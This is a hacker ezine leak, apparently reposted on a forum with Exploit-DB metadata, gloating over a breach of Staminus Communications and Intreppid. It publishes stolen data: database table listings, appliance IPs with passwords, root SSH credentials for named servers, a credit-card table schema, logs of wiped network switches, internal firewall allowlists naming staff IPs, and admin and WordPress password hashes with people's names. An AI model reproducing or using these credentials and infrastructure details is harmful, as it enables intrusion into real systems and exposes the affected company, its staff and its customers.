Exploit FUCK THEM ALL (FTA) - Staminus Communications

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
42898
Проверка EDB
  1. Пройдено
Автор
FTA
Тип уязвимости
PAPERS
Платформа
EZINE
CVE
N/A
Дата публикации
2016-03-11
FUCK THEM ALL (FTA) - Staminus Communications
Код:
  /$$$$$$$$ /$$   /$$  /$$$$$$  /$$   /$$       /$$ /$$$$$$$$ /$$      /$$        /$$$$$$  /$$       /$$      
 | $$_____/| $$  | $$ /$$__  $$| $$  /$$/      | $/| $$_____/| $$$    /$$$       /$$__  $$| $$      | $$      
 | $$      | $$  | $$| $$  \__/| $$ /$$/       |_/ | $$      | $$$$  /$$$$      | $$  \ $$| $$      | $$      
 | $$$$$   | $$  | $$| $$      | $$$$$/            | $$$$$   | $$ $$/$$ $$      | $$$$$$$$| $$      | $$      
 | $$__/   | $$  | $$| $$      | $$  $$            | $$__/   | $$  $$$| $$      | $$__  $$| $$      | $$      
 | $$      | $$  | $$| $$    $$| $$\  $$           | $$      | $$\  $ | $$      | $$  | $$| $$      | $$      
 | $$      |  $$$$$$/|  $$$$$$/| $$ \  $$          | $$$$$$$$| $$ \/  | $$      | $$  | $$| $$$$$$$$| $$$$$$$$
 |__/       \______/  \______/ |__/  \__/          |________/|__/     |__/      |__/  |__/|________/|________/

~FTA~FTA~FTA~FTA~FTA~FTA~FTA~FTA~FTA~FTA~FTA~FTA~FTA~FTA~FTA~FTA~FTA~FTA~FTA~FTA~FTA~FTA~FTA~FTA~FTA~FTA~FTA~FTA~

  ~[CTRL-C]~ PREFACE
  
    "fuck":(third-person singular simple present fucks, present participle fucking, simple past and past participle fucked)
	
		- (vulgar, colloquial, often obscene) To have sexual intercourse, to copulate
			"Fighting for peace is like fucking for virginity."
			
		- (vulgar, colloquial) To put in an extremely difficult or impossible situation.
			"I'm afraid they're gonna fuck you on this one."

███████╗████████╗ █████╗ ███╗   ███╗██╗███╗   ██╗██╗   ██╗███████╗
██╔════╝╚══██╔══╝██╔══██╗████╗ ████║██║████╗  ██║██║   ██║██╔════╝
███████╗   ██║   ███████║██╔████╔██║██║██╔██╗ ██║██║   ██║███████╗
╚════██║   ██║   ██╔══██║██║╚██╔╝██║██║██║╚██╗██║██║   ██║╚════██║
███████║   ██║   ██║  ██║██║ ╚═╝ ██║██║██║ ╚████║╚██████╔╝███████║
╚══════╝   ╚═╝   ╚═╝  ╚═╝╚═╝     ╚═╝╚═╝╚═╝  ╚═══╝ ╚═════╝ ╚══════╝
                            "Bring it on baby"

  ~[CTRL-D]~ STAMINUS
         
        TIPS WHEN RUNNING A SECURITY COMPANY:
                ~ Use one root password for all the boxes
                ~ Expose PDU's to WAN with telnet auth
                ~ Never patch, upgrade or audit the stack
                ~ Disregard PDO as inconvenient
                ~ Hedge entire business on security theatre
                ~ Store full credit card info in plaintext
                ~ Write all code with wreckless abandon

    Database: staminus2
    [185 tables]
    +------------------------------+
    | GOBIG_capture                |
    | GOBIG_global_defaults        |
    | GOBIG_group                  |
    | GOBIG_ip                     |
    | GOBIG_ip_account             |
    | GOBIG_landing                |
    | GOBIG_marketing              |
    | GOBIG_vpn                    |
    | GOBIG_wifi_router            |
    | GOBIG_wifi_router_account    |
    | GOBIG_wifi_router_inventory  |
    | ZONE_backend                 |
    | ZONE_domain                  |
    | ZONE_feature                 |
    | ZONE_feature_main            |
    | ZONE_feature_package         |
    | ZONE_feature_site            |
    | ZONE_frontend                |
    | ZONE_ip                      |
    | ZONE_main                    |
    | ZONE_ns                      |
    | ZONE_package                 |
    | ZONE_queue                   |
    | ZONE_site                    |
    | ZONE_sp                      |
    | session                      |
    | user                         |
    | abuse_stats                  |
    | account                      |
    | account_information          |
    | account_server               |
    | acknowledgeLog               |
    | actionLog                    |
    | active_db                    |
    | addon                        |
    | api                          |
    | appliance                    |
    | appliance_action_log         |
    | appliance_group              |
    | appliance_group_actions      |
    | appliance_group_names        |
    | appliance_lan                |
    | appliance_log                |
    | bgp_advertise_log            |
    | bgp_info                     |
    | bgp_tunnel_info              |
    | billing                      |
    | billing_array                |
    | billing_detail               |
    | billing_onapp                |
    | billing_server               |
    | bundle_ip                    |
    | bw_track                     |
    | bw_usage                     |
    | cancel_reason                |
    | ccbilling                    |
    | clean_graph_map              |
    | cloud_ip_map                 |
    | config                       |
    | contract_info                |
    | coupon                       |
    | credit_card                  |
    | ddos_historical_data         |
    | ddos_report                  |
    | ddos_report_details          |
    | denied_order                 |
    | dynamic_protected            |
    | email_queue                  |
    | email_subscription           |
    | email_template               |
    | flowNullConfig               |
    | flowStats                    |
    | geoip_country_blocks         |
    | geoip_country_locations      |
    | geoip_country_whois          |
    | gig_hour_usage_history       |
    | gighour_usage                |
    | huawei_cleaning              |
    | huawei_requests              |
    | huawei_requests_log          |
    | ip_limit                     |
    | ip_limit_history             |
    | ip_limit_profile             |
    | ip_limit_profiles            |
    | ipmi_ip                      |
    | lan_subnet                   |
    | loginLog                     |
    | max_mind_results             |
    | motd                         |
    | msg_communication            |
    | nextip                       |
    | nullroute_report             |
    | nullroutes                   |
    | number_of_ips                |
    | oauth_access_tokens          |
    | oauth_authorization_codes    |
    | oauth_clients                |
    | oauth_jwt                    |
    | oauth_refresh_tokens         |
    | oauth_scopes                 |
    | oauth_users                  |
    | page_hiding                  |
    | page_hiding_pages            |
    | promotion                    |
    | promotion_landing            |
    | promotion_stock              |
    | protect_log                  |
    | queue                        |
    | rating_banlist               |
    | rating_details               |
    | rating_settings              |
    | rating_summary               |
    | raw_log                      |
    | restore_lansubnet            |
    | restore_serverip             |
    | router_monitor               |
    | run_rate_historical_data     |
    | scloud                       |
    | scloud_backend               |
    | scloud_backend_options       |
    | scloud_backend_variables     |
    | scloud_frontend              |
    | scloud_frontend_options      |
    | secureport                   |
    | secureport20150629           |
    | secureport_active_baseline   |
    | secureport_entry             |
    | secureport_gighour           |
    | secureport_profile           |
    | secureport_profiles          |
    | secureport_restore1          |
    | secureport_restore2          |
    | secureport_states            |
    | secureport_states_exempt     |
    | secureport_states_syn        |
    | secureport_static_whitelist  |
    | secureport_whitelist         |
    | secureportfoo                |
    | server                       |
    | server_addon                 |
    | server_ddos_report           |
    | server_firewall              |
    | server_ip                    |
    | server_ip6                   |
    | server_map                   |
    | server_monitor               |
    | server_price_historical_data |
    | service_request              |
    | shipping_log                 |
    | short_term_block_log         |
    | signup                       |
    | slow_egress                  |
    | staff                        |
    | staff_block                  |
    | staff_push                   |
    | staff_queue                  |
    | static_bypass                |
    | static_protected             |
    | stock                        |
    | stock_compatible_addon       |
    | swip                         |
    | ticket                       |
    | ticket_message               |
    | ticket_queue                 |
    | ticket_server                |
    | ticket_staff_message         |
    | ticket_statistics_data       |
    | traffic_block                |
    | traffic_live                 |
    | traffic_live_global          |
    | traffic_live_server          |
    | traffic_report               |
    | traffic_report_entry         |
    | tunnel_info                  |
    | udp_block                    |
    | whitelist_ip                 |
    | work_order                   |
    | work_order_addon             |
    | work_order_available_options |
    | work_order_message           |
    | work_order_option            |
    | work_order_server            |
    | work_order_staff             |
    | work_order_ticket            |
    | work_order_type              |
    +------------------------------+
	
	mysql> mysql> select * from appliance;
	+----+----------+-------------------+------------+---------+----------------+-----------------+----------------+-------------+-------------+
	| ID | serverID | name              | hostname   | groupID | ip             | netmask         | gateway        | peerIP      | md5password |
	+----+----------+-------------------+------------+---------+----------------+-----------------+----------------+-------------+-------------+
	| 11 |   200014 | Leonardo          | sec01-via1 |       9 | 216.46.165.2   | 255.255.255.252 | 216.46.165.1   | 74.63.128.9 | qYaENLr3    |
	| 13 |   200015 | sec02-via1        | sec02-via1 |       9 | 216.24.132.254 | 255.255.255.252 | 216.24.132.253 | 74.63.128.9 | qYaENLr3    |
	| 15 |   200016 | sec03-via1        | sec03-via1 |       9 | 206.71.66.2    | 255.255.255.252 | 206.71.66.1    | 74.63.128.9 | qYaENLr3    |
	| 17 |   200017 | sec04-via1        | sec04-via1 |       9 | 216.46.191.202 | 255.255.255.252 | 216.46.191.201 | 74.63.128.9 | qYaENLr3    |
	| 19 |   200001 | 87751-MON01.SLC04 | NULL       |       9 | 204.246.136.86 | 255.255.255.252 | 204.246.136.85 | NULL        | NULL        |
	| 21 |   200002 | 87751-MON01.DAL01 | NULL       |       9 | 66.205.176.154 | 255.255.255.252 | 66.205.176.153 | NULL        | NULL        |
	| 23 |   200003 | 87751-MON01.LAS04 | NULL       |       9 | 209.170.203.74 | 255.255.255.252 | 209.170.203.73 | NULL        | NULL        |
	| 25 |   200004 | 87751-MON01.MSP01 | NULL       |       9 | 209.236.97.130 | 255.255.255.252 | 209.236.97.129 | NULL        | NULL        |
	| 27 |   200005 | 87751-MON01.PHX01 | NULL       |       9 | 76.9.185.162   | 255.255.255.252 | 76.9.185.161   | NULL        | NULL        |
	| 29 |   200006 | 87751-MON01.PDX01 | NULL       |       9 | 207.189.98.18  | 255.255.255.252 | 207.189.98.17  | NULL        | NULL        |
	| 31 |   200007 | 87751-MON01.SLC07 | NULL       |       9 | 66.133.96.2    | 255.255.255.252 | 66.133.96.1    | NULL        | NULL        |
	| 32 |   200020 | MON01-NAC         | sec01-nac1 |      14 | 207.99.107.6   | 255.255.255.252 | 207.99.107.5   | NULL        | NULL        |
	| 38 |   200021 | MON02-NAC         | sec02-nac1 |      14 | 207.99.112.174 | 255.255.255.252 | 207.99.112.173 | NULL        | NULL        |
	| 44 |   200022 | MON03-NAC         | sec03-nac1 |      14 | 207.99.113.102 | 255.255.255.252 | 207.99.113.101 | NULL        | NULL        |
	+----+----------+-------------------+------------+---------+----------------+-----------------+----------------+-------------+-------------+
	14 rows in set (0.00 sec)
	
	mysql> describe credit_card;
	+-----------+------------------+------+-----+---------+----------------+
	| Field     | Type             | Null | Key | Default | Extra          |
	+-----------+------------------+------+-----+---------+----------------+
	| ID        | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
	| accountID | varchar(100)     | NO   | MUL | NULL    |                |
	| firstName | varchar(30)      | YES  |     | NULL    |                |
	| lastName  | varchar(30)      | YES  |     | NULL    |                |
	| number    | varchar(17)      | NO   |     | NULL    |                |
	| expMonth  | int(2)           | NO   |     | NULL    |                |
	| expYear   | int(4)           | NO   |     | NULL    |                |
	| validated | int(1)           | YES  |     | 0       |                |
	| main      | int(1)           | YES  |     | 0       |                |
	| cvv       | varchar(10)      | YES  |     | NULL    |                |
	+-----------+------------------+------+-----+---------+----------------+
	10 rows in set (0.00 sec)
	
	:: SAMPLE ::
	
	["SPCHECK"    spcheck     ssh:104.131.132.49 ]:root:St4m|nu5
	["VM HOST"    cl08-irv1   ssh:72.8.154.8     ]:root:St4m|nu5
	["MOTHERLOAD" apitest     ssh:69.197.35.134  ]:root:St4m|nu5
	["CHATBOT"    chatbot     ssh:69.197.35.133  ]:root:St4m|nu5
	["backup01-s3073-cab38-ocloud-irv1" ssh:69.197.40.229]:root:St4m|nu5
	["ams2"                   ssh:176.56.238.205 ]:root:St4m|nu5
	["proxweb"                ssh:72.8.128.4]:root:St4m|nu5
	["smb01-irv1"             ssh:72.8.128.34]:root:St4m|nu5
	["kkk"                    ssh:69.197.31.193]:root:TkBNk7TdrSh2Uq42
	["puppet-agent"           ssh:199.192.78.210]:root:St4m|nu5

	:: SAMPLE ::
	
	Formatting bootflash: ...
	Format of bootflash complete
	Erasing nvram:
	Erasing cat4000_flash:
	Clearing crashinfo:data
	Clearing the last power failure timestamp
	Clearing all ROMMON variables
	Setting default ROMMON variables:
		ConfigReg=0x2101
		PS1=rommon ! >
		EnableAutoConfig=1
	Setting vtp mode to transparent
	%WARNING! Please reboot the system for the changes to take effect
	aggr2.irv1#reset
	
    OURNETS="72.20.0.0/18 69.197.0.0/18 72.8.128.0/18 199.192.72.0/21"
    RFC1918="10.0.0.0/8 192.168.0.0/16"
    LOCAL="127.0.0.0/8"

    ## External (people or resources)
    JOHN_ALLOW="216.114.66.22 65.110.55.179 63.246.134.202 69.26.161.38 72.20.10.253 162.230.6.44 162.230.6.45"
    HASSAN_ALLOW="72.8.154.80 41.130.32.164 72.8.154.79"
    EUGENE_ALLOW="66.228.39.208 199.192.76.90"
    ONAPP_ALLOW="83.170.70.4 69.72.249.232"
    CYBERSOURCE_ALLOW="66.185.176.0/20"
    JEFF_ALLOW="209.44.125.0/28 205.204.94.18 69.197.35.154 69.197.38.80/28"
    MATT_ALLOW="70.169.227.248 99.46.104.171"
    ARAD_ALLOW="174.67.216.146"
    ERIC_HO_ALLOW="76.216.235.9 70.181.119.63 68.15.73.170 68.170.67.222"
    EXTERNAL_VPN_ALLOW="72.8.128.35"


    ## Set our main allow variable
    ALLOW=""

    ## Global allows
    ALLOW_MAIN=""
    ALLOW_MAIN="$ALLOW_MAIN $RFC1918 $LOCAL"
    ALLOW_MAIN="$ALLOW_MAIN 72.20.1.2 72.20.0.0/24 69.197.1.0/24"   # Internal
    ALLOW_MAIN="$ALLOW_MAIN 199.241.199.0/24";                      # IB AMS1
    ALLOW_MAIN="$ALLOW_MAIN 199.241.198.0/24";                      # IB NYC1
    ALLOW_MAIN="$ALLOW_MAIN 162.220.32.62";                 # IB NYC1 ATRATO
    ALLOW_MAIN="$ALLOW_MAIN 199.241.197.0/24";                      # IB LAX1
    ALLOW_MAIN="$ALLOW_MAIN 199.241.196.0/24";                      # IB LAX2
    ALLOW_MAIN="$ALLOW_MAIN 69.197.3.204 69.197.3.205 69.197.3.206" # IB IRV1
    ALLOW="$ALLOW $ALLOW_MAIN"

    ## OOB
    ALLOW_OOB=""
    ALLOW_OOB="$ALLOW_OOB 98.189.83.123";                           # OOB Irvine
    ALLOW_OOB="$ALLOW_OOB 207.166.140.0/29";                        # OOB Coresite
    ALLOW_OOB="$ALLOW_OOB 198.24.32.82";                            # OOB NYC1
    ALLOW_OOB="$ALLOW_OOB 213.52.181.178";                          # OOB AMS1
    ALLOW_OOB="$ALLOW_OOB 66.128.156.60";                           # OOB LAX2
    ALLOW="$ALLOW $ALLOW_OOB"

    ## Comm
    ALLOW_COMM=""
    ALLOW_COMM="$ALLOW_COMM $MATT_ALLOW $ARAD_ALLOW $EUGENE_ALLOW"
    ALLOW_COMM="$ALLOW_COMM 4.2.2.1 8.8.8.8"                        # DNS
    ALLOW_COMM="$ALLOW_COMM 18.7.21.144 66.241.101.63"              # TIME
    ALLOW_COMM="$ALLOW_COMM 69.197.63.142"                          # IRV1 LAN
    ALLOW_COMM="$ALLOW_COMM 72.20.22.29"                            # LAX1 WIFI
    ALLOW_COMM="$ALLOW_COMM 72.20.55.32/29"                         # VPN
    ALLOW="$ALLOW $ALLOW_COMM"

    ## Routers / Bridges / SP
    ALLOW_ROUTER=""
    ALLOW_ROUTER="$ALLOW_ROUTER 224.0.0.0/8"                # Multicast / OSPF
    ALLOW="$ALLOW $ALLOW_ROUTER"

    ## Core servers


    ## SNMP Pulling to a specific server also goes here
    ALLOW_CORE=""
    ALLOW_CORE="$ALLOW_CORE 72.8.154.76"                    # staffwiki
    ALLOW_CORE="$ALLOW_CORE 72.8.154.85"                    # captive-portal
    ALLOW_CORE="$ALLOW_CORE 72.8.157.186"                   # intrepid multicraft
    ALLOW_CORE="$ALLOW_CORE 72.8.154.76"                    # staffwiki
    ALLOW_CORE="$ALLOW_CORE 72.8.154.91"                    # web02-irv1
    ALLOW_CORE="$ALLOW_CORE 72.20.10.78"                    # web03-irv1
    ALLOW_CORE="$ALLOW_CORE 72.8.156.176"                   # web03-lax1
    ALLOW_CORE="$ALLOW_CORE 72.8.128.34"                    # smb01-irv1
    ALLOW_CORE="$ALLOW_CORE 69.197.32.75"                   # intreppid web
    ALLOW_CORE="$ALLOW_CORE 72.8.183.206"                   # web01-int-irv1.intreppid
    ALLOW_CORE="$ALLOW_CORE 69.197.35.55"                   # public wiki
    ALLOW_CORE="$ALLOW_CORE 72.8.154.71"                    # dev01-irv1
    ALLOW_CORE="$ALLOW_CORE 72.8.154.89"                    # dev02-irv1
    ALLOW_CORE="$ALLOW_CORE 72.8.154.66"                    # sql01-irv1
    ALLOW_CORE="$ALLOW_CORE 72.8.156.175"                   # sql02-irv1
    ALLOW_CORE="$ALLOW_CORE 72.8.154.69"                    # mx01-irv1
    ALLOW_CORE="$ALLOW_CORE 72.20.26.125"                   # Staminus Webserver vhosts
    ALLOW_CORE="$ALLOW_CORE 69.197.58.67"                   # www.staminus.net
    ALLOW_CORE="$ALLOW_CORE 72.20.5.98"                     # captcha01-irv1
    ALLOW_CORE="$ALLOW_CORE 199.241.197.97"                 # bbgre01-lax1
    ALLOW_CORE="$ALLOW_CORE 199.241.198.15"                 # bbgre01-nyc1
    ALLOW_CORE="$ALLOW_CORE 199.241.199.15"                 # bbgre01-ams1
    ALLOW_CORE="$ALLOW_CORE 72.8.156.130"                   # gre01-lax1
    ALLOW_CORE="$ALLOW_CORE 72.8.156.174"                   # gre02-lax1
    ALLOW_CORE="$ALLOW_CORE 72.8.156.131"                   # cache01-lax1
    ALLOW_CORE="$ALLOW_CORE 72.8.156.162"                   # jmp01-lax1
    ALLOW_CORE="$ALLOW_CORE 72.20.9.2"                      # jmp01-lax2
    ALLOW_CORE="$ALLOW_CORE 72.8.154.75"                    # jmp01-irv1
    ALLOW_CORE="$ALLOW_CORE 72.8.154.72"                    # ldap01-irv1
    ALLOW_CORE="$ALLOW_CORE 69.197.63.150"                  # manage01-irv1
    ALLOW_CORE="$ALLOW_CORE 66.241.102.86"                  # monitor-vitelity
    ALLOW_CORE="$ALLOW_CORE 66.241.100.79"                  # cacti-vitelity
    ALLOW_CORE="$ALLOW_CORE 72.8.154.95/32 72.20.53.2"      # cacti-irv1
    ALLOW_CORE="$ALLOW_CORE 199.241.198.141"                # cacti01-nyc1
    ALLOW_CORE="$ALLOW_CORE 199.241.199.146"                # cacti01-nyc1
    ALLOW_CORE="$ALLOW_CORE 66.241.106.77"                  # pbx1-dnv1
    ALLOW_CORE="$ALLOW_CORE 72.20.40.1 72.20.40.102"        # NFS
    ALLOW_CORE="$ALLOW_CORE 69.197.61.80/29"                # LB 10G Subnet
    ALLOW_CORE="$ALLOW_CORE 72.8.154.87"                    # nagios-irv1
    ALLOW_CORE="$ALLOW_CORE 72.8.154.95"                    # cacti-irv1
    ALLOW_CORE="$ALLOW_CORE 72.8.156.152";                  # backup01-lax1
    ALLOW_CORE="$ALLOW_CORE 69.197.35.178";                 # infrasvn01-irv1
    ALLOW_CORE="$ALLOW_CORE 69.197.35.249";                 # push01-irv1
    ALLOW_CORE="$ALLOW_CORE 69.197.35.158";                 # push02-irv1
    ALLOW_CORE="$ALLOW_CORE 69.197.35.150";                 # nfs02-irv1
    ALLOW_CORE="$ALLOW_CORE 69.197.2.34";                   # sniff-cab26-irv1
    ALLOW_CORE="$ALLOW_CORE 69.197.63.150";                 # sniff-cab0-irv1
    #ALLOW_CORE="$ALLOW_CORE 72.8.128.6";                   # pxc01-irv1
    #ALLOW_CORE="$ALLOW_CORE 72.8.128.7";                   # pxc02-irv1
    #ALLOW_CORE="$ALLOW_CORE 72.8.152.20";                  # pxc01-lax1
    ALLOW="$ALLOW $ALLOW_CORE"


    ## Useful because these are our common servers that we want allowed everywhere
    ALLOW_BASE1="$ALLOW_MAIN $ALLOW_OOB $ALLOW_COMM $ALLOW_CORE"

    ## Infrastucture SVN does not need to allow any access to it other than below
    ALLOW_BASE2="$ALLOW_MAIN $ALLOW_OOB $ALLOW_COMM"

    ## Other Servers
    ALLOW_SRV=""
    ALLOW_SRV="$ALLOW_SRV 72.8.154.74 72.20.27.29"          # IRV1 SURV1
    ALLOW="$ALLOW $ALLOW_SRV"

    ## Physical Infrastructure
    ALLOW_INFRA=""
    ALLOW_INFRA="$ALLOW_INFRA 72.8.189.128/25"                      # IRV1 APC PDUs
    ALLOW_INFRA="$ALLOW_INFRA 72.8.144.0/25"                        # IRV1 APC PDUs
    ALLOW_INFRA="$ALLOW_INFRA 72.20.39.208/28"                      # APC 1W SUITE 805 AA03/AA04/AA05
    ALLOW="$ALLOW $ALLOW_INFRA"

    ## Management
    ALLOW_MANAGE=""
    ALLOW_MANAGE="$ALLOW_MANAGE 72.8.158.128/26 69.197.23.32/28"    # IRV1 RAR
    ALLOW_MANAGE="$ALLOW_MANAGE 72.8.143.0/25"                      # IRV1 RAR
    ALLOW_MANAGE="$ALLOW_MANAGE 72.20.54.58"                        # rar1.irv1
    ALLOW_MANAGE="$ALLOW_MANAGE 72.20.54.62"                        # rar2.irv1
    ALLOW_MANAGE="$ALLOW_MANAGE 72.20.38.174"                       # IPKVM
    ALLOW_MANAGE="$ALLOW_MANAGE 72.20.39.174"                       # Spider IPKVM
    # lax1 and lax2 raritans defined in other subnets
    ALLOW="$ALLOW $ALLOW_MANAGE"

    ## No idea what this is.  One of these subnets is now customer allocated.  I can't find them reserved in ip.class.
    #ALLOW="$ALLOW 72.8.131.224/29"                 # LAX2 C1 MANAGEMENT
    #ALLOW="$ALLOW 72.20.51.0/28"                   # LAX2 C2 MANAGEMENT
    #ALLOW="$ALLOW 72.20.41.208/28"                 # LAX2 C3 MANAGEMENT
    #ALLOW="$ALLOW 72.20.52.128/28"                 # LAX2 C4 MANAGEMENT
    #ALLOW="$ALLOW 72.20.36.112/28"                 # LAX2 C5 MANAGEMENT



    ## Intreppid
    ALLOW_INTREP="$ALLOW_INTREP 72.8.183.234"                       # cust1-irv1.intreppid.com
    ALLOW_INTREP="$ALLOW_INTREP 72.8.183.206"                       # server1.intreppid.com, web01-int-irv1.intreppid.com
    ALLOW_INTREP="$ALLOW_INTREP 72.8.157.186"                       # cust2-irv1.intreppid.com
    ALLOW_INTREP="$ALLOW_INTREP 72.8.157.90"                        # source1-irv1.intreppid.com
    ALLOW_INTREP="$ALLOW_INTREP 72.20.30.102"                      # cust3-irv1.intreppid.com
    ALLOW_INTREP="$ALLOW_INTREP 162.220.32.2"                      # cust1-nyc1.intreppid.com

    ALLOW="$ALLOW $ALLOW_INTREP"

    ## VM: Internal Xen Pool
    ALLOW_VM_XEN_INT=""
    ALLOW_VM_XEN_INT="$ALLOW_VM_XEN_INT 72.8.153.0/24"                      # Xen Storage - irv1
    ALLOW_VM_XEN_INT="$ALLOW_VM_XEN_INT 72.8.154.0/24"                      # Xen cloud-irv1
    ALLOW_VM_XEN_INT="$ALLOW_VM_XEN_INT 72.8.152.0/27"                      # Xen Cloud - lax1 (aa05)
    ALLOW_VM_XEN_INT="$ALLOW_VM_XEN_INT 72.8.152.32/27"                     # Xen Storage - lax1 (aa05)
    ALLOW_VM_XEN_INT="$ALLOW_VM_XEN_INT 72.8.159.130"                       # Xen cloud06-lax1
    #ALLOW="$ALLOW $ALLOW_VM_XEN_INT"

    ## VM: Customer Xen Pool
    ALLOW_VM_XEN_CUST=""
    ALLOW_VM_XEN_CUST="$ALLOW_VM_XEN_CUST 69.197.63.221"                                    # stor0-cab26.irv1
    ALLOW_VM_XEN_CUST="$ALLOW_VM_XEN_CUST 69.197.2.2 69.197.2.6 69.197.2.10 69.197.2.14"    # pool-cab26-irv1
    ALLOW_VM_XEN_CUST="$ALLOW_VM_XEN_CUST 69.197.2.18 69.197.2.22 69.197.2.26"              # pool-cab26-irv1
    ALLOW_VM_XEN_CUST="$ALLOW_VM_XEN_CUST 69.197.2.30 69.197.2.34 69.197.2.38"              # pool-cab26-irv1
    ALLOW_VM_XEN_CUST="$ALLOW_VM_XEN_CUST 69.197.2.42 69.197.2.46 69.197.2.50"              # pool-cab26-irv1
    ALLOW_VM_XEN_CUST="$ALLOW_VM_XEN_CUST 69.197.2.54 69.197.2.58 69.197.2.62"              # pool-cab26-irv1
    ALLOW_VM_XEN_CUST="$ALLOW_VM_XEN_CUST 69.197.2.66 69.197.2.70 69.197.2.74"              # pool-cab26-irv1
    ALLOW_VM_XEN_CUST="$ALLOW_VM_XEN_CUST 69.197.2.78"                                      # pool-cab26-irv1
    #ALLOW="$ALLOW $ALLOW_VM_XEN_CUST"

    ## VM: Customer Onapp
    ALLOW_VM_ONAPP_CUST=""
    ALLOW_VM_ONAPP_CUST="$ALLOW_VM_ONAPP_CUST 69.197.40.224/27"                                     # Onapp Cloud (CP+HV)
    ALLOW_VM_ONAPP_CUST="$ALLOW_VM_ONAPP_CUST 72.20.52.32/27"                                       # Onapp Cloud Managem
    ALLOW_VM_ONAPP_CUST="$ALLOW_VM_ONAPP_CUST 72.20.56.160/27"                                      # Onapp Cloud Storage
    ALLOW_VM_ONAPP_CUST="$ALLOW_VM_ONAPP_CUST 72.20.45.160/27 69.197.51.128/26"                     # Onapp Cloud Applian
    #ALLOW_VM_ONAPP_CUST="$ALLOW_VM_ONAPP_CUST 72.20.42.224/27"                                     # Onapp Cloud Provisi
    #ALLOW="$ALLOW $ALLOW_VM_ONAPP_CUST"

    
██╗███╗   ██╗████████╗██████╗ ███████╗██████╗ ██████╗ ██╗██████╗ 
██║████╗  ██║╚══██╔══╝██╔══██╗██╔════╝██╔══██╗██╔══██╗██║██╔══██╗
██║██╔██╗ ██║   ██║   ██████╔╝█████╗  ██████╔╝██████╔╝██║██║  ██║
██║██║╚██╗██║   ██║   ██╔══██╗██╔══╝  ██╔═══╝ ██╔═══╝ ██║██║  ██║
██║██║ ╚████║   ██║   ██║  ██║███████╗██║     ██║     ██║██████╔╝
╚═╝╚═╝  ╚═══╝   ╚═╝   ╚═╝  ╚═╝╚══════╝╚═╝     ╚═╝     ╚═╝╚═════╝ 

  ~[CTRL-G]~ INTREPPID
  mysql> select ID,user_login,user_pass,user_email,display_name from wp_users;
    +----+------------+------------------------------------+----------------------------+----------------+
    | ID | user_login | user_pass                          | user_email                 | display_name   |
    +----+------------+------------------------------------+----------------------------+----------------+
    |  1 | Intrepid   | $P$Bg3ea3fGT/TZY5xJusY4z8G8I8ILLu0 | [email protected]          | Intrepid       |
    |  2 | JonathanF  | $P$BgBYOIQCL5D3sO1Rb613vG7lz5mGwL1 | [email protected] | Jonathan Fong  |
    |  4 | Intreppid  | $P$B.sWV52K7I0MjPY6R1X.WGVYy3OYWp0 | [email protected]          | Intreppid      |
    |  8 | Daddy      | $P$BxdgzLlpb8COonSBxC7oTQAaie8jv9. | [email protected]           | Brandon Harris |
    |  5 | AradM      | $P$B5Q/wWxoW30vJ7UcMwj0yTaeru85kQ/ | [email protected]  | Arad Mahdavi   |
    |  6 | MattM      | $P$BxdgzLlpb8COonSBxC7oTQAaie8jv9. | [email protected]    | Matt Mahvi     |
    |  7 | DaneT      | $P$B9amTGmavXeU8HDTHjxdI05o39Brds/ | [email protected]     | Dane Tuso      |
    +----+------------+------------------------------------+----------------------------+----------------+
  mysql> select email,password,passwordhash from tbladmins where disabled=0;
    +------------------------------+--------------------------------------------------------------+--------------------------------------------------------------+
    | email                        | password                                                     | passwordhash                                                 |
    +------------------------------+--------------------------------------------------------------+--------------------------------------------------------------+
    | [email protected]   | $2y$10$fNwuVcURM4DV88lS9uH5LehQHn71DDw47LohXW63D0yXiMPzwO3Xe | $2y$10$fBm6QC/tVuJzn7bR.Bjq6uZQJYcryfvUJTwg..xifNrKvlG7fSN2O |
    | [email protected]      | $2y$10$YGdBvbUJJXMZyTog7pTaHOuQfNn2pIgcvrkALV6NEr22Nl/uBSQ1u | $2y$10$4WESz22yrG3FzeiRhwqCNOkmRb2Y85y.dvXQjJ8PuTi1IkL1fKCw. |
    | [email protected]    | $2y$10$8wQWTUsp7zXJcHqgiboIW.RWA.3D2wqm0lQ6Omg5B4ajkFJ.YGfMq | $2y$10$8mEhg5jeWOauma6TEzPdAuPYDHE1xpVQ9aDwMEqyvrIdUub8sMaCG |
    | [email protected]      | $2y$10$ymI0xW7FbzEYkg4Lh4W75eP6l5GUZN1PLYtC6gBBg.zLAYQm1gNH6 | $2y$10$2Nf7qB3p9N14eUhaBa7xi.uX0OQoshKfk9L09evb96PodKP3ZP5uu |
    | [email protected]     | $2y$10$sKY2JvtlTkvXiBXu1EYbHev58oM1al9sKSF489hkbUhq.uQw4ft82 | $2y$10$xf8iEfdxE91fNrAoNncJ.ObL3uwwW9km/1Dq8HQ6p9FKuFn2mhAu. |
    | [email protected]     | $2y$10$juWgDKEgZpjrzPhlHNERsuou5VxPWII1yAGolYd1jSdmeOee0NBzK | $2y$10$l6zTYZN.1IHTS8iUbsj23ukPeP0RxvrigLJFjmo604AyavsFbX.We |
    | [email protected]  | $2y$10$RBqtBNDwWCiVfgk9p4b5s.m5HJzkfd5Ra6yRaFSSgvTup/EjvGWTe | $2y$10$oxECgACyxuXwOil/aWzu4u4oHUhjbCOvEP0Q8EjQsUzoY3x5mG.Pm |
    | [email protected] | $2y$10$OSWfPL2Lla8L8a19PaFpc.2aHKa/k.sWXlE8EOisFjyaOAe79WXOe | $2y$10$T4t/ZGgxWY0EPX.eaZQk8.Fz8Gu4sLTxqwEFsDnikfrtisRv0SDi2 |
    | [email protected] | $2y$10$5yRlVQT5ZFjiV7fFusxZDOa6bDuISv7iARc1LTumaX8VKMuv.MTc2 | $2y$10$hTHfh..kJicqoUVcFYVW8.MdUHG8CpRGVZ1vKzau3vt.wDTXUiIIW |
    | [email protected]         | $2y$10$YOzk6EZ/5fKdC1QPQzeLfuNRbtVzsEThDPWw40BJePi3QkL5MA7Qa | $2y$10$BwdWHPMg9h08hECSkqK2OORtqSMIfYrV61WgwFCtmHj9x7i7W6gIC |
    | [email protected]         | $2y$10$0i050vZEy4KO2IXefkAHy.kpZHOCk54iPHg0BErvBAe9yYOEEAAle | $2y$10$hd/SWuEKoCLhHFkScSNv2.JCqMcOnnwbXjv7YbEgz5htTuoRlEQPK |
